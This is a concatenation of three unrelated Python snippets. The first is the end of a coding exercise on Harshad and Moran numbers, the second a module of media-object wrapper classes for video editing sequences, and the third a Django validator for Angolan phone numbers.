A Harshad number is a number which is divisible by the sum of its digits. For example, 132 is divisible by 6 (1+3+2).
A subset of the Harshad numbers are the Moran numbers. Moran numbers yield a prime when divided by the sum of their
digits. For example, 133 divided by 7 (1+3+3) yields 19, a prime.

Create a function that takes a number and returns "M" if the number is a Moran number, "H" if it is a (non-Moran)
Harshad number, or "Neither".

Examples
moran(132) ➞ "H"
moran(133) ➞ "M"
moran(134) ➞ "Neither"

Notes:
You may need to make a method to determine whether a number is prime.
'''

def moran(num):
    # Code here
    pass
3.078125
3
turnovertools/mediaobject.py
morganwl/turnovertools
0
12771499
#!/usr/bin/env python3

from abc import ABCMeta
import collections.abc


class MediaObject(object):
    """
    Parent class for all media objects. Not meant to be instantiated
    directly.
    """

    __wraps_type__ = type(None)
    __default_data__ = []
    __requires_properties__ = []

    @classmethod
    def wrap_list(cls, data_list, parent=None, **kwargs):
        """
        Wraps a list of data objects using the given MediaObject child
        class, returning them in a new list.
        """
        mob_list = []
        for d in data_list:
            mob_list.append(cls(d, parent=parent, **kwargs))
        return mob_list

    def __init__(self, data=None, parent=None, **kwargs):
        """
        Instantiate MediaObject with a new data object, or with kwargs.
        """
        self.parent = parent
        if data is not None:
            assert isinstance(data, self.__wraps_type__)
            self.data = data
        else:
            self.data = self.__wraps_type__(*self.default_data)
        for key, val in kwargs.items():
            if key in self.__requires_properties__:
                setattr(self, key, val)
            else:
                raise AttributeError('Invalid keyword parameter ' + key)

    def __setattr__(self, key, value):
        """
        Optionally call a private _on_update method whenever attributes
        are changed in this object.
        """
        self._on_update(key, value)
        super(MediaObject, self).__setattr__(key, value)

    def _on_update(self, key, value):
        pass


class Sequence(MediaObject, collections.abc.Sequence):
    def __init__(self, data=None, **kwargs):
        super(Sequence, self).__init__(data=data, **kwargs)
        self.tracks = []

    def __getitem__(self, i):
        return self.tracks[i]

    def __len__(self):
        return len(self.tracks)


class SequenceTrack(MediaObject, collections.abc.Sequence):
    def __init__(self, data=None, **kwargs):
        super(SequenceTrack, self).__init__(data=data, **kwargs)
        self.events = []

    def __getitem__(self, i):
        return self.events[i]

    def __len__(self):
        return len(self.events)


class Event(MediaObject):
    __requires_properties__ = ['clip_name', 'source_file', 'tape_name']

    def get_custom(self, name):
        raise NotImplementedError()

    @property
    def posterframes(self):
        """Returns a list of posterframes (in record), or rec_start_frame
        in list form."""
        if getattr(self, '_posterframes', None):
            return self._posterframes
        return [0]

    @posterframes.setter
    def posterframes(self, val):
        self._posterframes = val

    @property
    def reel(self):
        if self.tape_name is not None:
            return self.tape_name
        return self.source_file

    @reel.setter
    def reel(self, val):
        if self.source_file is not None:
            self.source_file = val
        self.tape_name = val


class SourceClip(MediaObject):
    def get_custom(self, name):
        raise NotImplementedError()

    @property
    def reel(self):
        if self.tape_name is not None:
            return self.tape_name
        return self.source_file

    @reel.setter
    def reel(self, val):
        if self.source_file is not None:
            self.source_file = val
        self.tape_name = val


class Bin(MediaObject):
    pass


class DictWrapperMeta(ABCMeta):

    def __new__(meta, name, bases, class_dict):
        lookup = class_dict.get('__lookup__', {})
        for prop, target in lookup.items():
            if prop not in class_dict:
                class_dict[prop] = property(meta.getmapper(target),
                                            meta.setmapper(target))
        cls = type.__new__(meta, name, bases, class_dict)
        return cls

    def getmapper(target):
        def getter(self):
            return self.data.get(target, None)
        return getter

    def setmapper(target):
        # The setter closes over the mapped dictionary key.
        def setter(self, val):
            self.data[target] = val
        return setter


class DictWrapper(object, metaclass=DictWrapperMeta):
    __wraps_type__ = dict
2.109375
2
vpos/validators.py
txiocoder/django-vpos
3
12771627
<reponame>txiocoder/django-vpos
import re

from django.core import validators
from django.utils.deconstruct import deconstructible
from django.utils.translation import gettext_lazy as _


@deconstructible
class PhoneAOValidator(validators.RegexValidator):
    regex = r'^(?:(\+244|00244))?(9)(1|2|3|4|9)([\d]{7,7})$'
    default_replace = r'\2\3\4'
    message = _('Invalid national phone number of angola')

    @classmethod
    def match(cls, string):
        return re.match(cls.regex, string)

    @classmethod
    def clean_number(cls, phone: str):
        return re.sub(cls.regex, cls.default_replace, phone)


# default
PhoneValidator = PhoneAOValidator
1.445313
1